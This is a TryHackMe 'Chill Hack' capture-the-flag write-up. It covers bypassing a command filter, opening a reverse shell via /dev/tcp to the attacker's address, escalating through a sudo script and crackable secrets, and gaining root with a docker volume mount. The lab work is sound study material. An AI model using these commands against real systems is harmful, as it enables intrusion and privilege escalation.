Chill Hack — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Chill Hack — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -A -T4 -p- -v <ip>
There are 3 ports opened: 21(FTP), 22(SSH), and 80(HTTP).
As FTP allows anonymous login, I will see what’s inside first:
There’s only 1 file: note.txt, and it gives me some information:
1/ 2 names: Anurodh and Apaar
2/ Input filtering of “command”
I haven’t known what “command” here means. So just leave it there first. Next, access the website:
Such a well-designed website! I’ve checked the page source (Ctrl+U), but not found any valuable information. So let’s move to finding the hidden dirs using gobuster:
gobuster dir -u http://<ip>/ -w /path-to-wordlist
An interesting dir: /secret. Let’s access it:
Well I can execute command here! Try with “ls -al”:
Well it doesn’t execute my command but shows an alert. Let’s try “pwd”:
Hmm it executes this time. Take a look at the “note.txt’ above, I know that the command input here will be filtered and only allows specific command to be executed.
Let’s try bypass this filter. First, I’ll use “\” so the command will be “l\s -al”:
Oh it works! So now I’ll see the content of “index.php” using c\a\t:
Ok so now I know what commands are filtered. Many of them can be used to spawn a reverse shell. However, take a close look, the blacklisted list only contains the commands’ names, not their full path… What if I spawn a reverse shell using full path to command?
First, start a listener on your machine:
nc -lvnp 4444
Then, exec this command:
/bin/bash -c ‘/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1’
And yes, the command has been executed and I’ve got the shell into the target! However, up to now, I cannot read anything inside users’ home due to permission:
So, let’s find a way to get higher priv. Spawn a tty shell using Python3:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
First, sudo -l to see if I can run sudo now:
Well I can run a script called “.helpline.sh” as apaar inside his home. Let’s execute it:
sudo -u apaar /home/apaar/.helpline.sh
Well not much happens. See the content of this script?
Well so the “message” input will be passed right to the #!/bin/bash, which can be used to spawn a new shell for me as “apaar”. So let’s run this script again, but this time, input the msg as “/bin/bash”:
And now, I’m apaar! Again spawn a tty shell using the Python above. Let’s see the content of “local.txt’:
It’ll be the 1st flag!
Now I’ll find a way to own root and get the final flag. First, sudo -l:
Looks like I cannot use sudo to priv esc to root as apaar. So I’ll find another way. Normally, a machine with webserver can highly be vulnerable to information leaked in “/var/www/”. Let’s cd to this folder to look for sensitive information.
A folder “files” is inside.
Look in the dark..? Hmm, let’s see the default page: index.php:
And yes, I’ve got the mysql credential! Let’s login to mysql:
mysql -u root -p
It works! Move around the database and I’ve found a user’s hash password:
Let’s crack the password of “Anurodh” using this link:
I’ve tried to su anurodh with this password, but it doesn’t work. So it’s only used for the website.
Let’s find another way. cd images inside files to see what’s inside:
The image “hacker….jpg” looks suspicious. Transfer it to your machine and use steghide to see if there’s any hidden data:
steghide extract -sf hack….jpg
Oh there’s a backup.zip inside! Let’s unzip it and read the content.
However, I need a password to unzip this file. So let’s use “john” to bruteforce the password.
zip2john backup.zip > backupjohn.txt
john — wordlist=rockyou.txt backupjohn.txt
After a while john has cracked the password. Unzip again and read content of source_code.php:
Well I’ve found another password of Anurodh. Decode it from base64:
Now let’s su anurodh again with this password:
Now I’m anurodh! Look at the group, he’s in “docker” group. So that I can use docker command to priv esc to root:
docker run -v /:/mnt — rm -it alpine chroot /mnt sh
Now I’m root! Get the final flag inside root’s folder: